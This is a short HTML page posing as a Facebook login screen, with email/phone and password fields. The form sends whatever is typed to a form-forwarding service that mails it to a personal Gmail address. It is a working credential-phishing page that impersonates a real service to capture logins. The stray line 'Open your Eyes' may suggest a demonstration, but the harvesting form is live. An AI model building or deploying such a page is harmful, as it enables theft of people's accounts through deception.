<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <title>HTML</title>
  
  <link rel="stylesheet" href="style.css">
</head>
 <body> 
  <div>
  <h1>Facebook<h1>
    
    
      
    
   <form action="https://formsubmit.co/memo.dopaly0@gmail.com" method="POST">
     
   <input type="hidden" name="_subject" value="New email">
   <input type="email" name="email" 
   placeholder=" E-mail or Phone" required>
   <input type="password" name="password"
   placeholder="Password" required>
   
   
   <button type="submit">Login</button>
   
   <a href="#">new password ?</a>
   
     

  <p>Open your Eyes</p>
  </div>
  <script src="main.js"></script>
  
    
  
</body>
</html>
